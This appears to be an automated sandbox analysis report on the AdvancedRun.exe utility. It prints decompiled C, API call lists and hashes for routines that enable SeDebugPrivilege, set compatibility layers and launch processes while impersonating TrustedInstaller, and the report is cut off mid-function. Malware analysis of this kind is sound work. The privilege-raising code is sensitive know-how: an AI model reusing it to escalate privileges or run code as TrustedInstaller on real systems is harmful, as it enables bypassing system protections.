Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AdvancedRun.exe PID: 6344 Parent PID: 1864 AdvancedRun.exeCOMMON

Executed Functions

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

16BITCOLOR, xrefs: 004026BA
256COLOR, xrefs: 004026AE
640X480, xrefs: 004026CE
DISABLEDWM, xrefs: 004026EC
DISABLETHEMES, xrefs: 004026DD
__COMPAT_LAYER, xrefs: 00402814
"%s" %s, xrefs: 0040263B
D, xrefs: 00402374
HIGHDPIAWARE, xrefs: 004026FB
RunAsInvoker, xrefs: 00402677

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864a
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32 ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

/Run, xrefs: 0040867F
`oA, xrefs: 004088D0
XA, xrefs: 004088E5
, xrefs: 00408595
/cfg, xrefs: 00408727
/savelangfile, xrefs: 004088A3
%I64x, xrefs: 004085E7
SeDebugPrivilege, xrefs: 004085B3

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
